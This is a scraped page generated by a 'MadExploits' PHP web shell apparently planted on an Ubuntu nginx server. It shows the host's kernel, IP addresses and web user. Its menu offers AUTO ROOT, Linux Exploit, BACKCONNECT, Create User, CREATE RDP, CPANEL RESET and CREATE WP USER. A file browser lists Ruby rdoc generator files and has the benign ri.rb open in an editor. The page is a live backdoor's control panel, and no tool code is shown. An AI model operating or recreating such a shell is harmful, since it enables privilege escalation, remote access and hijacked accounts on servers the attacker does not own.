Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
3.0.0 /
rdoc /
generator /
[ HOME SHELL ]
Name
Size
Permission
Action
pot
[ DIR ]
drwxr-xr-x
template
[ DIR ]
drwxr-xr-x
darkfish.rb
20.25
KB
-rw-r--r--
json_index.rb
7.59
KB
-rw-r--r--
markup.rb
3.26
KB
-rw-r--r--
pot.rb
2.25
KB
-rw-r--r--
ri.rb
464
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ri.rb
# frozen_string_literal: true ## # Generates ri data files class RDoc::Generator::RI RDoc::RDoc.add_generator self ## # Description of this generator DESCRIPTION = 'creates ri data files' ## # Set up a new ri generator def initialize store, options #:not-new: @options = options @store = store @store.path = '.' end ## # Writes the parsed data store to disk for use by ri. def generate @store.save end end
Close